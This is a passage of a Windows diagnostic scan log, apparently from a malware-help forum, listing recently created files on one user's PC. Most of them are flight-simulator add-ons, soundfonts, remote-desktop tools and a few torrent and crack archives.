C:\WINDOWS\system32\twinui.dll 2016-10-13 15:27 - 2016-10-05 02:29 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll 2016-10-13 15:27 - 2016-10-05 02:29 - 01145856 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll 2016-10-13 15:27 - 2016-10-05 02:28 - 03059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll 2016-10-13 15:27 - 2016-10-05 02:28 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe 2016-10-13 15:27 - 2016-10-05 02:28 - 00406016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll 2016-10-13 15:27 - 2016-10-05 02:28 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.HostName.dll 2016-10-13 15:27 - 2016-10-05 02:27 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll 2016-10-13 15:27 - 2016-10-05 02:26 - 00182784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll 2016-10-13 15:27 - 2016-10-05 02:23 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll 2016-10-13 15:27 - 2016-10-05 02:22 - 07654912 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll 2016-10-13 15:27 - 2016-10-05 02:22 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll 2016-10-13 15:27 - 2016-10-05 02:22 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll 2016-10-13 15:27 - 2016-10-05 02:21 - 00310272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll 2016-10-13 15:27 - 2016-10-05 02:21 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ErrorDetails.dll 2016-10-13 15:27 - 2016-10-05 02:20 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll 2016-10-13 15:27 - 2016-10-05 02:18 - 01656832 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll 2016-10-13 15:27 - 2016-10-05 02:17 - 04136960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll 2016-10-13 15:27 - 2016-10-05 02:17 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\adsmsext.dll 2016-10-13 15:27 - 2016-10-05 02:16 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe 2016-10-13 15:27 - 2016-10-05 02:16 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll 2016-10-13 15:27 - 2016-10-05 02:15 - 03617792 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2016-10-13 15:27 - 2016-10-05 02:15 - 01840640 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll 2016-10-13 15:27 - 2016-10-05 02:15 - 00833024 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll 2016-10-13 15:27 - 2016-10-05 02:15 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll 2016-10-13 15:27 - 2016-10-05 02:14 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll 2016-10-13 15:27 - 2016-10-05 02:14 - 01013760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll 2016-10-13 15:27 - 2016-10-05 02:14 - 00701952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Connectivity.dll 2016-10-13 15:27 - 2016-10-05 02:11 - 03496960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVidCtl.dll 2016-10-13 15:27 - 2016-10-05 02:09 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll 2016-10-13 15:27 - 2016-10-05 02:08 - 02356736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVidCtl.dll 2016-10-13 15:27 - 2016-10-05 02:08 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll 2016-10-13 15:27 - 2016-10-05 02:07 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Sensors.dll 2016-10-13 15:27 - 2016-10-05 02:07 - 00542208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Connectivity.dll 2016-10-13 15:27 - 2016-10-05 02:06 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll 2016-10-13 15:27 - 2016-10-04 17:01 - 00446124 _____ C:\WINDOWS\system32\ApnDatabase.xml 2016-10-13 15:08 - 2016-10-13 15:27 - 74538332 _____ C:\Users\Kyle Aniel\Downloads\ready_for_pushback_boeing_747-200v2_fs2004.zip 2016-10-11 21:35 - 2016-10-11 22:09 - 101448493 _____ C:\Users\Kyle Aniel\Downloads\MD-8x.rar 2016-10-11 21:17 - 2016-10-11 21:17 - 23402545 _____ (Markus Schwenk) C:\Users\Kyle Aniel\Downloads\MidiEditor-3.0.0-Setup.exe 2016-10-11 14:24 - 2016-10-11 14:24 - 00000000 ____D C:\Users\Kyle Aniel\Documents\test 2016-10-11 14:08 - 2016-10-11 14:42 - 63307776 _____ C:\Users\Kyle Aniel\Downloads\Fsx - md 80.rar 2016-10-11 14:08 - 2016-10-11 14:08 - 00019924 _____ C:\Users\Kyle Aniel\Downloads\f-s-x-flight-1-super-md-80.torrent 2016-10-10 21:33 - 2016-10-10 21:33 - 00155346 _____ C:\Users\Kyle Aniel\Downloads\1476160139_J0OdkDfEzHBASpqKICO9_tr.mid 2016-10-10 21:33 - 2016-10-10 21:33 - 00155346 _____ C:\Users\Kyle Aniel\Downloads\1476160139_J0OdkDfEzHBASpqKICO9_tr (1).mid 2016-10-10 21:21 - 2016-10-10 21:22 - 116153496 _____ C:\Users\Kyle Aniel\Downloads\Orchestra Soundfont 2 COMBO.sf2 2016-10-10 21:14 - 2016-10-10 21:15 - 148358590 _____ C:\Users\Kyle Aniel\Downloads\FluidR3_GM.sf2 2016-10-10 21:10 - 2016-10-10 21:14 - 75148691 _____ C:\Users\Kyle Aniel\Downloads\FluidR3_GM.sfArk 2016-10-10 21:08 - 2016-10-10 21:08 - 12189088 _____ C:\Users\Kyle Aniel\Downloads\Chaos_V20.sf2 2016-10-10 21:06 - 2016-10-18 19:38 - 00001977 _____ C:\Users\banie_000\Desktop\SynthFont.lnk 2016-10-10 21:06 - 2016-10-10 21:07 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\SynthFont 2016-10-10 21:06 - 2016-10-10 21:06 - 07479100 _____ (Kenneth Rundt) C:\Users\Kyle Aniel\Downloads\SynthFontSetup.exe 2016-10-10 21:06 - 2016-10-10 21:06 - 00000000 ____D C:\Users\banie_000\Documents\SynthFont 2016-10-10 21:06 - 2016-10-10 21:06 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SynthFont 2016-10-10 21:06 - 2016-10-10 21:06 - 00000000 ____D C:\Program Files (x86)\SynthFont 2016-10-10 21:04 - 2016-10-10 21:05 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\SFPACK 2016-10-10 21:04 - 2016-10-10 21:04 - 00000752 _____ C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SFPack.lnk 2016-10-10 21:03 - 2016-10-10 21:03 - 06823140 _____ C:\Users\Kyle Aniel\Downloads\Chaos_V20.sfArk 2016-10-10 21:03 - 2016-10-10 21:03 - 00110774 _____ C:\Users\Kyle Aniel\Downloads\SFPACK.zip 2016-10-10 20:51 - 2016-10-11 21:23 - 00178744 _____ C:\Users\Kyle Aniel\Downloads\25287_Rhapsody-in-Blue.mid 2016-10-09 22:54 - 2016-10-09 22:54 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\sas_md81 2016-10-09 22:27 - 2016-10-09 22:51 - 73172380 _____ C:\Users\Kyle Aniel\Downloads\sas_md81.zip 2016-10-09 22:11 - 2016-10-09 22:11 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blender 2016-10-09 22:10 - 2016-10-09 22:10 - 00000000 ____D C:\Program Files\Blender Foundation 2016-10-09 22:08 - 2016-10-09 22:59 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\md80-88_pack_v2 2016-10-09 22:08 - 2016-10-09 22:09 - 89464832 _____ C:\Users\Kyle Aniel\Downloads\blender-2.78-windows64.msi 2016-10-09 22:05 - 2016-10-09 22:07 - 86701411 _____ C:\Users\Kyle Aniel\Downloads\md80-88_pack_v2.zip 2016-10-09 17:02 - 2016-10-09 17:02 - 00015413 _____ C:\Users\Kyle Aniel\Downloads\c-l-s-m-d82-jet-liner.torrent 2016-10-09 16:32 - 2016-10-09 16:34 - 146373100 _____ C:\Users\Kyle Aniel\Downloads\CLS MD 81.rar 2016-10-09 16:31 - 2016-10-09 16:31 - 03833515 _____ C:\Users\Kyle Aniel\Downloads\FSUIPC4.40.rar 2016-10-09 16:30 - 2016-10-09 16:30 - 00001827 _____ C:\Users\Kyle Aniel\Downloads\f-s9-f-s-x-f-s-u-i-p-c-440.torrent 2016-10-08 23:05 - 2016-10-08 23:05 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\44936-B737-800 2016-10-08 23:04 - 2016-10-08 23:05 - 02745258 _____ C:\Users\Kyle Aniel\Downloads\44936-B737-800.zip 2016-10-08 22:57 - 2016-10-08 22:57 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSND_FSX-B737Upgraded_Cockpit 2016-10-08 22:56 - 2016-10-08 22:56 - 25298732 _____ C:\Users\Kyle Aniel\Downloads\FSND_FSX-B737Upgraded_Cockpit.zip 2016-10-08 18:54 - 2016-10-08 18:54 - 00478301 _____ C:\Users\Kyle Aniel\Desktop\concorde144af_parts.pdf 2016-10-08 18:54 - 2016-10-08 18:54 - 00236704 _____ C:\Users\Kyle Aniel\Desktop\concorde144_instr.pdf 2016-10-08 18:36 - 2016-10-08 18:36 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\CLSMD80&87 2016-10-08 18:30 - 2016-10-08 18:30 - 00017879 _____ C:\Users\Kyle Aniel\Downloads\[torrenty.to] [FSX]CLS MD81-82 and MD87 with serial.torrent 2016-10-08 17:50 - 2016-10-17 19:16 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\JustFlight 2016-10-08 17:37 - 2016-10-08 17:47 - 1172939413 _____ C:\Users\Kyle Aniel\Downloads\JF Tristar by iTrekx.rar 2016-10-08 17:28 - 2016-10-08 17:28 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\toml1011 2016-10-08 17:27 - 2016-10-08 17:27 - 10282684 _____ C:\Users\Kyle Aniel\Downloads\toml1011.zip 2016-10-08 17:06 - 2016-10-08 17:06 - 00599420 _____ C:\Users\Kyle Aniel\Downloads\[Free-scores.com]_gershwin-george-rhapsody-in-blue-31021.pdf 2016-10-08 16:20 - 2016-10-16 06:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\aerosoft 2016-10-08 16:00 - 2015-04-17 13:46 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Aerosoft 2016-10-08 14:40 - 2016-10-08 14:40 - 01360299 _____ C:\Users\Kyle Aniel\Downloads\sky-textures-for-enb-series_12.zip 2016-10-08 14:14 - 2016-10-08 14:14 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\738BLACKPANELFIX 2016-10-08 14:12 - 2016-10-08 14:13 - 02986348 _____ C:\Users\Kyle Aniel\Downloads\738BLACKPANELFIX.zip 2016-10-08 13:53 - 2016-10-08 13:53 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\B737_800 2016-10-08 13:51 - 2016-10-08 13:51 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\CanjetBoeing738FSX 2016-10-08 13:11 - 2016-10-08 13:50 - 118588938 _____ C:\Users\Kyle Aniel\Downloads\CanjetBoeing738FSX.zip 2016-10-08 12:22 - 2016-10-08 15:04 - 00000000 ____D C:\ProgramData\firebird 2016-10-08 12:21 - 2016-10-18 19:38 - 00000650 _____ C:\Users\banie_000\Desktop\PRO-ATC-X.lnk 2016-10-08 12:21 - 2016-10-08 12:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PRO-ATC-X 2016-10-08 12:18 - 2016-10-08 12:41 - 00000000 ____D C:\PRO-ATC-X 2016-10-08 12:08 - 2016-10-08 12:08 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Pointsoft-Pro-ATC-X.v1.2.3.8 2016-10-08 11:46 - 2016-10-08 11:51 - 236842241 _____ C:\Users\Kyle Aniel\Downloads\Pointsoft-Pro-ATC-X.v1.2.3.8.zip 2016-10-08 11:45 - 2016-10-08 11:45 - 00018526 _____ C:\Users\Kyle Aniel\Downloads\[www.seedpeer.eu] Fsx P3d Pointsoft Pro Atc X V1 2 3 8.SEEDPEER.torrent 2016-10-08 09:29 - 2016-10-08 09:30 - 68343766 _____ C:\Users\Kyle Aniel\Downloads\FSX How to autoland (ILS land) EASY - Tutorial.mp4 2016-10-08 09:28 - 2016-10-08 09:28 - 00002847 _____ C:\Users\Kyle Aniel\Downloads\mfp.htm 2016-10-08 07:21 - 2016-10-08 07:22 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\aa738908nn-x-fsrepaintsger 2016-10-08 07:16 - 2016-10-08 07:20 - 09618253 _____ C:\Users\Kyle Aniel\Downloads\aa738908nn-x-fsrepaintsger.zip 2016-10-07 23:27 - 2016-10-07 23:27 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\b738american_fsx 2016-10-07 23:17 - 2016-10-07 23:26 - 27010695 _____ C:\Users\Kyle Aniel\Downloads\b738american_fsx.zip 2016-10-07 23:07 - 2016-10-07 23:07 - 16120277 _____ C:\Users\Kyle Aniel\Downloads\tds_boeing_737-800_american_n969nn (1).zip 2016-10-07 23:01 - 2016-10-07 23:01 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\posky_boeing_737-800_okay_airways_fsx 2016-10-07 22:59 - 2016-10-07 22:59 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSX Cracks para todas las verciones 2016-10-07 22:58 - 2016-10-07 22:58 - 06235914 _____ C:\Users\Kyle Aniel\Downloads\FSX Cracks para todas las verciones.rar 2016-10-07 22:57 - 2016-10-07 23:00 - 16161514 _____ C:\Users\Kyle Aniel\Downloads\posky_boeing_737-800_okay_airways_fsx.zip 2016-10-07 22:38 - 2016-10-07 22:39 - 13630490 _____ C:\Users\Kyle Aniel\Downloads\tds738_aal_318440 (1).zip 2016-10-07 22:36 - 2016-10-07 22:36 - 14138519 _____ C:\Users\Kyle Aniel\Downloads\american_n932an (1).zip 2016-10-07 22:35 - 2016-10-07 22:35 - 16120354 _____ C:\Users\Kyle Aniel\Downloads\tds_boeing_737-800_american_n969nn.zip 2016-10-07 22:34 - 2016-10-07 22:35 - 09891996 _____ C:\Users\Kyle Aniel\Downloads\tds738_american_airlines.zip 2016-10-07 22:34 - 2016-10-07 22:34 - 11109908 _____ C:\Users\Kyle Aniel\Downloads\tds737-800aal-twa.zip 2016-10-07 22:34 - 2016-10-07 22:34 - 09932969 _____ C:\Users\Kyle Aniel\Downloads\tds737-800aal-renoair.zip 2016-10-07 22:33 - 2016-10-07 22:33 - 14138519 _____ C:\Users\Kyle Aniel\Downloads\american_n932an.zip 2016-10-07 22:33 - 2016-10-07 22:33 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\american_n932an 2016-10-07 22:32 - 2016-10-07 22:33 - 13630490 _____ C:\Users\Kyle Aniel\Downloads\tds738_aal_318440.zip 2016-10-07 22:27 - 2016-10-07 22:27 - 13969822 _____ C:\Users\Kyle Aniel\Downloads\TDS-737-800WL-American-Airlines-N909NN.zip 2016-10-07 22:26 - 2016-10-07 22:26 - 20893343 _____ C:\Users\Kyle Aniel\Downloads\TDS-737-800WL-American-Airlines-N925NN.zip 2016-10-07 21:48 - 2016-10-07 21:55 - 939436352 _____ (Acresso Software Inc. ) C:\Users\Kyle Aniel\Downloads\AS_AIRBUS-X-EXTENDED_FSX-P3D_V115 (1).exe 2016-10-07 21:25 - 2016-10-07 21:31 - 939436352 _____ (Acresso Software Inc. ) C:\Users\Kyle Aniel\Downloads\AS_AIRBUS-X-EXTENDED_FSX-P3D_V115.exe 2016-10-07 21:17 - 2016-10-07 21:18 - 305520897 _____ C:\Users\Kyle Aniel\AppData\Local\ACCCx3_8_0_310.zip.aamdownload 2016-10-07 21:17 - 2016-10-07 21:18 - 00003413 _____ C:\Users\Kyle Aniel\AppData\Local\ACCCx3_8_0_310.zip.aamdownload.aamd 2016-10-07 20:58 - 2016-10-18 19:38 - 00001225 _____ C:\Users\banie_000\Desktop\Continue AndyOS Installation.lnk 2016-10-06 20:32 - 2016-10-06 20:32 - 99223394 _____ C:\Users\Kyle Aniel\Desktop\Math textbook answers.zip 2016-10-06 18:03 - 2016-10-06 18:03 - 02727678 _____ C:\Users\Kyle Aniel\Downloads\44582-B737-800.zip 2016-10-06 18:03 - 2016-10-06 18:03 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\44582-B737-800 2016-10-06 17:59 - 2016-10-06 17:59 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\default_737_vc_gray_upgrade_texture 2016-10-06 17:58 - 2016-10-06 17:58 - 14710813 _____ C:\Users\Kyle Aniel\Downloads\default_737_vc_gray_upgrade_texture.zip 2016-10-05 21:47 - 2016-10-05 22:01 - 1642885475 _____ C:\Users\Kyle Aniel\Desktop\AS_AIRBUS-A320-A321_FSX-P3D-FSXSTEAM_V130a.rar 2016-10-05 21:44 - 2016-10-05 21:44 - 05128495 _____ C:\Users\Kyle Aniel\Downloads\Windows 8 to OS X Yosemite (5th Edition).pdf 2016-10-05 19:33 - 2016-10-05 19:33 - 00000000 _____ C:\Users\Kyle Aniel\Desktop\New Text Document (2).txt 2016-10-05 18:12 - 2016-10-18 19:40 - 00001919 _____ C:\Users\Public\Desktop\BlueStacks.lnk 2016-10-05 18:12 - 2016-10-18 19:39 - 00001931 _____ C:\ProgramData\Microsoft\Windows\Start Menu\BlueStacks.lnk 2016-10-05 17:57 - 2016-10-05 18:12 - 00000000 ____D C:\Program Files (x86)\Bluestacks 2016-10-05 17:57 - 2016-09-29 07:00 - 00000000 ____D C:\ProgramData\Bluestacks 2016-10-05 17:55 - 2016-10-05 17:57 - 322368136 _____ (BlueStack Systems Inc.) C:\Users\Kyle Aniel\Downloads\BlueStacks2_native_5740d773271a7331d8c1a4ebc64792e5.exe 2016-10-05 05:51 - 2016-10-05 05:53 - 00000104 _____ C:\Users\Kyle Aniel\Desktop\New Text Document.txt 2016-10-05 05:34 - 2016-10-06 15:55 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\New folder 2016-10-04 19:59 - 2016-10-04 19:59 - 00597304 _____ C:\Users\Kyle Aniel\Downloads\flux-setup.exe 2016-10-04 19:59 - 2016-10-04 19:59 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Flux 2016-10-04 19:59 - 2016-10-04 19:59 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\FluxSoftware 2016-10-04 19:43 - 2016-10-04 19:43 - 00000000 ___HD C:\$Windows.~WS 2016-10-04 19:42 - 2016-10-04 19:44 - 00000000 ____D C:\ESD 2016-10-04 19:41 - 2016-10-04 19:41 - 18309328 _____ (Microsoft Corporation) C:\Users\Kyle Aniel\Downloads\MediaCreationTool (1).exe 2016-10-04 19:35 - 2016-10-18 19:40 - 00001150 _____ C:\Users\Public\Desktop\Oracle VM VirtualBox.lnk 2016-10-04 19:35 - 2016-10-04 19:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Oracle VM VirtualBox 2016-10-04 19:35 - 2016-10-04 19:35 - 00000000 ____D C:\Program Files\Oracle 2016-10-04 19:35 - 2016-09-12 18:18 - 00920168 _____ (Oracle Corporation) C:\WINDOWS\system32\Drivers\VBoxDrv.sys 2016-10-04 19:35 - 2016-09-12 18:17 - 00149256 _____ (Oracle Corporation) C:\WINDOWS\system32\Drivers\VBoxUSBMon.sys 2016-10-04 19:34 - 2016-10-04 19:35 - 122288608 _____ (Oracle Corporation) C:\Users\Kyle Aniel\Downloads\VirtualBox-5.1.6-110634-Win.exe 2016-10-04 19:15 - 2016-10-04 19:15 - 01409778 _____ C:\Users\Kyle Aniel\Downloads\CA_U2M04L01_TE.pdf 2016-10-04 14:07 - 2016-10-04 14:07 - 18309328 _____ (Microsoft Corporation) C:\Users\Kyle Aniel\Downloads\MediaCreationTool.exe 2016-10-04 14:07 - 2016-10-04 14:07 - 00000000 ____D C:\$WINDOWS.~BT 2016-10-04 13:44 - 2016-10-04 13:44 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Splashtop 2016-10-04 13:42 - 2016-10-04 13:42 - 00000000 ____D C:\ProgramData\Splashtop 2016-10-04 13:42 - 2016-10-04 13:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Splashtop Remote 2016-10-04 13:42 - 2016-10-04 13:42 - 00000000 ____D C:\Program Files (x86)\Splashtop 2016-10-04 13:41 - 2016-10-04 13:41 - 25636832 _____ (Splashtop Inc.) C:\Users\Kyle Aniel\Downloads\Splashtop_Streamer_Windows_v3.1.0.0.exe 2016-10-03 19:55 - 2016-10-03 19:55 - 00000000 ____D C:\ProgramData\Google 2016-10-03 19:50 - 2016-10-03 19:50 - 12427264 _____ C:\Users\Kyle Aniel\Downloads\chromeremotedesktophost.msi 2016-10-03 19:46 - 2016-10-03 19:47 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Deployment 2016-10-03 19:46 - 2016-10-03 19:46 - 00016108 _____ C:\Users\Kyle Aniel\Downloads\rdassistant.application 2016-10-03 19:46 - 2016-10-03 19:46 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Remote Desktop assistant 2016-10-03 19:40 - 2016-10-03 19:40 - 00000000 ____H C:\Users\Kyle Aniel\Documents\Default.rdp 2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\SxS 2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\Shapes 2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\resx 2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\Resources 2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\FileTypes 2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\Effects 2016-10-02 18:47 - 2016-10-02 18:47 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\737800AA 2016-10-02 18:40 - 2016-10-02 18:43 - 08687986 _____ C:\Users\Kyle Aniel\Downloads\737800AA.zip 2016-10-02 18:26 - 2016-10-02 18:26 - 01515520 _____ C:\Users\Kyle Aniel\Downloads\VAInterface_2.20.3.11642 (2).msi 2016-10-02 18:26 - 2016-10-02 18:26 - 01515520 _____ C:\Users\Kyle Aniel\Downloads\VAInterface_2.20.3.11642 (1).msi 2016-10-02 17:51 - 2016-10-02 17:52 - 64991096 _____ ( Flight1, Inc.) C:\Users\Kyle Aniel\Downloads\Super-80-FSX (1).exe 2016-10-02 17:48 - 2016-10-02 17:49 - 64991096 _____ ( Flight1, Inc.) C:\Users\Kyle Aniel\Downloads\Super-80-FSX.exe 2016-10-02 17:45 - 2016-10-02 17:46 - 2969567232 _____ C:\Users\Kyle Aniel\Downloads\FSX_Acceleration.iso 2016-10-02 17:41 - 2016-10-02 17:41 - 01520816 _____ C:\Users\Kyle Aniel\Downloads\DeluxeCrack.rar 2016-10-02 17:41 - 2016-10-02 17:41 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\DeluxeCrack 2016-10-02 17:38 - 2016-10-02 17:38 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Crackacceleration 2016-10-02 17:36 - 2016-10-02 17:36 - 01582010 _____ C:\Users\Kyle Aniel\Downloads\Crackacceleration.rar 2016-10-02 09:00 - 2016-10-02 13:31 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\CS_B777-200ER_GE 2016-10-02 08:48 - 2016-10-02 08:52 - 142847356 _____ C:\Users\Kyle Aniel\Desktop\Captain Sim 777 demo.mp4 2016-10-02 08:33 - 2016-10-02 08:33 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\rrtrent800snd 2016-10-02 08:15 - 2016-10-02 08:16 - 54397943 _____ C:\Users\Kyle Aniel\Downloads\rrtrent800snd.zip 2016-10-02 08:10 - 2016-08-03 13:03 - 1115007685 ____N C:\Users\Kyle Aniel\Desktop\Th3.M2rt12n.15.007.M0viesC0unter.mp4 2016-10-02 07:29 - 2016-10-02 07:30 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\move 2016-10-01 21:29 - 2016-10-01 21:34 - 159565637 _____ C:\Users\Kyle Aniel\Desktop\EGLL Landing.mp4 2016-10-01 21:12 - 2016-10-01 21:12 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\KYLE-PC 10-1-2016 9.11.14 PM 2016-10-01 21:03 - 2016-10-01 21:03 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Expression 2016-10-01 18:52 - 2016-10-01 18:52 - 00000210 _____ C:\A320_.ini 2016-10-01 16:39 - 2016-10-01 16:44 - 1639972864 _____ C:\Users\Kyle Aniel\Downloads\AS_AIRBUS-A320-A321_FSX-P3D-FSXSTEAM_V130a.rar 2016-10-01 15:36 - 2016-10-01 15:36 - 00000210 _____ C:\B752_.ini 2016-10-01 15:21 - 2016-10-01 15:21 - 00051530 _____ C:\Users\banie_000\Documents\1.ecs 2016-10-01 15:15 - 2016-10-01 15:15 - 01515520 _____ C:\Users\Kyle Aniel\Downloads\VAInterface_2.20.3.11642.msi 2016-10-01 15:02 - 2016-10-01 15:02 - 00202240 _____ C:\Users\Kyle Aniel\Downloads\AirMouse.exe 2016-10-01 14:57 - 2016-10-01 14:57 - 22003144 _____ (Magic CPR, LLC) C:\Users\Kyle Aniel\Downloads\PointerMouseServer.exe 2016-10-01 14:56 - 2016-10-01 14:56 - 01427704 _____ (Magic CPR, LLC) C:\Users\Kyle Aniel\Downloads\MagicCPR.exe 2016-10-01 13:02 - 2016-10-01 13:02 - 00000136 _____ C:\Aircraft_cameras.INI 2016-10-01 12:42 - 2016-10-01 13:02 - 00000295 _____ C:\VC_cameras.INI 2016-10-01 12:35 - 2016-10-18 19:40 - 00001075 _____ C:\Users\Public\Desktop\English Manual.pdf.lnk 2016-10-01 12:33 - 2016-10-01 12:34 - 17538578 _____ C:\Users\Kyle Aniel\Downloads\EZDok Camera v1.18.7.rar 2016-10-01 11:20 - 2016-10-01 11:20 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\ADE_170_Production 2016-10-01 11:18 - 2016-10-01 11:19 - 17085562 _____ C:\Users\Kyle Aniel\Downloads\ADE_170_Production.zip 2016-10-01 07:53 - 2016-10-01 07:53 - 181852854 _____ C:\Users\Kyle Aniel\Downloads\FSDT-KLAXv2.7z 2016-10-01 05:55 - 2016-10-19 14:41 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Youcam 2016-09-30 06:02 - 2016-09-30 06:02 - 00204479 _____ C:\Users\Kyle Aniel\Desktop\Taxes.pdf 2016-09-29 19:00 - 2016-09-29 19:00 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Custom Office Templates 2016-09-29 18:17 - 2016-09-29 18:17 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\csb777_200_aanc 2016-09-29 18:13 - 2016-09-29 18:16 - 09176585 _____ C:\Users\Kyle Aniel\Downloads\csb777_200_aanc.zip 2016-09-29 18:05 - 2016-09-29 17:59 - 566525952 _____ C:\Users\Kyle Aniel\Desktop\00006.MTS 2016-09-29 18:04 - 2016-09-29 17:55 - 378273792 _____ C:\Users\Kyle Aniel\Desktop\00005.MTS 2016-09-29 18:04 - 2016-09-29 17:39 - 838041600 _____ C:\Users\Kyle Aniel\Desktop\00004.MTS 2016-09-29 18:03 - 2016-09-29 17:31 - 538509312 _____ C:\Users\Kyle Aniel\Desktop\00003.MTS 2016-09-29 18:03 - 2016-09-29 17:27 - 589037568 _____ C:\Users\Kyle Aniel\Desktop\00002.MTS 2016-09-29 18:03 - 2016-09-29 17:22 - 605945856 _____ C:\Users\Kyle Aniel\Desktop\00001.MTS 2016-09-29 18:02 - 2016-09-29 17:16 - 562790400 _____ C:\Users\Kyle Aniel\Desktop\00000.MTS 2016-09-29 15:15 - 2016-09-15 10:22 - 00860512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll 2016-09-29 15:15 - 2016-09-15 10:21 - 01000288 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi 2016-09-29 15:15 - 2016-09-15 09:56 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManagerApi.dll 2016-09-29 15:15 - 2016-09-15 09:40 - 05061120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll 2016-09-29 15:15 - 2016-09-15 09:40 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll 2016-09-29 15:15 - 2016-09-15 09:37 - 